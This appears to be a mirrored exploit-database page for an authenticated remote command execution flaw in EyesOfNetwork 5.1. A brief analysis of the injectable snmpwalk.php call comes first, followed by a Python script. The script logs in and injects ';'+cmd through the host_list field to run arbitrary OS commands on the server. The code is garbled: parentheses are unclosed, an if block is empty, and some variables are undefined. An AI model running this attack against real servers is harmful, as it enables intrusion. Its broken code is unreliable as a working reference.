Eyesofnetwork 5.1 authenticated remote command execution Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2019-08-16 | Type : webapps | Platform : php
This exploit / vulnerability Eyesofnetwork 5.1 authenticated remote command execution is for educational purposes only and if it is used you will do on your own risk!

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# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
# Google Dork: N/A
# Date: 2019-08-14
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
# Version: 5.1 < 5.0
# Tested on: Windows 10
# CVE : N/A

#About The Product:

''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application.
EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance.
EyesOfNetwork Supervision provides event management, availability, problems and capacity.
#Technical Analysis:
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
By looking into tools/snmpwalk.php we will find the vulnerable part of code:
$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
in this line we can see as the attacker who control the value of "$host_name" variable .
And after that we have the magic function "popen" in the next part of code.
$handle = popen($command,'r');
echo "<p>";<br />
while($read = fread($handle,100)){
echo nl2br($read);
And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.'''


import requests
import optparse
import sys
import bs4 as bs

commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
commandList.add_option('-u', '--user', action="store",
help="Insert username",
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
options, remainder = commandList.parse_args()

if not options.target or not options.cmd or not options.user or not options.pwd:


url = options.target
cmd = options.cmd
user = options.user
pwd = options.pwd

with requests.session() as c:
page_login=c.post(str(link)+"/login.php", data=login_data)
v_data = {"page": "bylistbox", "host_list": ";"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
page_v=c.post(v_url, data=v_data)
my=bs.BeautifulSoup(page_v.content, "lxml")
for textarea in my.find_all('p'):
final = textarea.get_text()
print final